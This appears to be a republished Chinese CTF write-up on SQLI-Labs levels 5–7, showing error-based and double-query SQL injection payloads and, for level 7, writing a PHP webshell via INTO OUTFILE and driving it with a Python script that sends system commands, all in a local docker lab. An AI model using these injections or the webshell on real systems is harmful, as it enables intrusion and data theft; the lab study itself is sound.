新闻详情

新闻详情

首页 / 资讯中心 / 详情

CTF BUU-Basic SQLI-Labs 5~7

发布时间:2026/10/2 12:55:40来源:尧图网络
CTF BUU-Basic SQLI-Labs 5~7
Abstract使用工具Burp Suite抓包尝试解决BUU-Basic SQL的基础题SQLI-Labs 5~7学习几种注入方法。欢迎各位提出宝贵意见~很高兴能帮助到您Page One 基础注入5 GET注入 双查询型/报错型 字符注入此题特点为没有直接回显点存在后端sql语法报错提示因此无法回显后端数据库的信息故使用报错注入双查询注入本质报错注入。1 用Burp抓包推测出是单引号注入后端查询语句为3列。使用union联合查询发现无直接回显点。方法一 双查询注入双查询sql语句报错原理是键值重复如下1 and ( select 1 from ( select count(*), concat(0x7e, (查询语句), 0x7e, floor(rand(0)*2)) as x from information_schema.tables group by x ) as t )#2 查询当前数据库再查询所有数据库查到ctftraining数据库查询flag表、flag列最后得到flag值如图方法二 报错注入报错注入sql语句报错原理是XPATH函数有语法错误如下1 and extractvalue(1, concat(0x7e, (查询语句)))2 思路同方法一相同在最后输出flag时发现存在长度限制故用substr()分段输出如图6 GET注入 双查询型/报错型 字符注入本题与5题思路与方法相同唯一区别在于使用双引号注入。7 GET注入 文件写入型 字符注入本题旨在利用任何用户可对目标服务器文件系统根目录有读写权限故利用sql注入向目标服务器写入一个shell.php木马文件进行对服务器进一步破坏。由于BUU靶场服务器关闭了权限无法解出flag故用docker搭建靶场进行学习。1 搭建好靶场首先打开靶场用户权限在powershell运行如下docker exec b3bdcfe3b05f chmod 777 /var/www/html/Less-7结束学习也关闭相应权限在powershell运行如下docker exec b3bdcfe3b05f chmod 755 /var/www/html/Less-72 用Burp抓包本题特点是无直接外显点前端只有对错提示无具体内容。优先尝试或或 )逐步推测是))注入后端sql查询语句是3列。3 注入前不存在此文件注入后成功查看到123.txt的内容说明into outfile在该目录创建新文件但是不能覆盖已有文件由于是linux系统优先猜测根目录是var/www/html/注意前端有报错混淆如图4 利用注入创建webshell.php文件包含一句话木马对其访问使其运行如图5 创建远程访问python脚本如下import requests url http://localhost:8888/Less-7/webshell.php def run_code(code): data {cmd: code} try: res requests.post(urlurl, datadata) print(Text:, res.text) except Exception as e: print(Failed:, str(e)) if __name__ __main__: run_code(system(cd dir);) run_code(system(cat less7-proof.txt);)先后运行两个system命令拿到通关凭证如图
网站建设高端定制企业官网
RELATED

相关资讯

更多精彩内容,欢迎继续阅读

较早相关资讯

最新相关资讯

AI日报系统设计:从信息采集到摘要生成的技术实践 2026/10/2 16:12:17

AI日报系统设计:从信息采集到摘要生成的技术实践

我无法基于当前输入生成符合要求的博文。原因在于:您提供的输入内容中,项目标题为“AI 日报(2026年9月23日)”,但后续未提供任何实质性项目正文、关键词或摘要描述。所有字段(项目正文、关键词、摘要描述&a…

阅读更多 →
零代码搭建AI-Agent实战:从入门到智能客服助手 2026/10/2 16:12:17

零代码搭建AI-Agent实战:从入门到智能客服助手

1. 为什么零代码搭建 AI-Agent 是当下最值得掌握的技能1.1 从“写代码”到“搭积木”的思维转变我第一次接触 AI-Agent 这个概念的时候,脑子里冒出来的第一个念头是:这玩意儿是不是又得写一大堆 Python 代码,调各种 API,处理各种异…

阅读更多 →
OMNeT+++INET+ECDH:WSN安全仿真中的密钥协商集成实践 2026/10/2 16:12:17

OMNeT+++INET+ECDH:WSN安全仿真中的密钥协商集成实践

3月13号那天,我本来只是想把手头一个无线传感器网络(WSN)安全仿真项目跑通,没想到光是版本对齐就花了大半个上午——OMNeT、INET和ECDH密码库这三样东西单拎出来都是成熟工具,但拼到一起的时候,隐藏的兼容性…

阅读更多 →
DocResearch:面向可溯源文档智能的三层流水线架构 2026/10/2 16:12:16

DocResearch:面向可溯源文档智能的三层流水线架构

1. 项目概述:一条命令背后,是文档智能处理的完整工作流闭环“DocResearch 项目理解:从一条命令到一份有出处的报告”——这个标题乍看像极了某个Python脚本的README第一行,但真正拆开来看,它其实精准勾勒出当前AI Agen…

阅读更多 →
提示词工程参数调优与高级技巧实战指南 2026/10/2 16:12:10

提示词工程参数调优与高级技巧实战指南

1. 为什么参数调优是提示词工程里最被低估的基本功很多人聊提示词工程,第一反应就是“写一段神奇的话让模型变聪明”。但我在实际项目里踩过最大的坑,恰恰不是措辞不够花哨,而是参数没配对。同一个提示词,温度值差0.3,…

阅读更多 →
DeepSeek Harness插件与Skill实战:从安装排障到工作流编排 2026/10/2 16:12:10

DeepSeek Harness插件与Skill实战:从安装排障到工作流编排

如果你手头的 DeepSeek Harness 还停留在“打开面板、输入问题、看回复”这个阶段,那我建议你抽十分钟看完这篇实操记录。DeepSeek Harness 真正值钱的地方,从来不是模型本身的对话能力,而是环绕在模型外层的插件系统——装上几个高质量的插件…

阅读更多 →

今日资讯

本周资讯

本月资讯

看完文章仍有疑问?

联系尧图顾问,获取一对一建站咨询

立即免费咨询 📞 400-888-8888
📞 ✉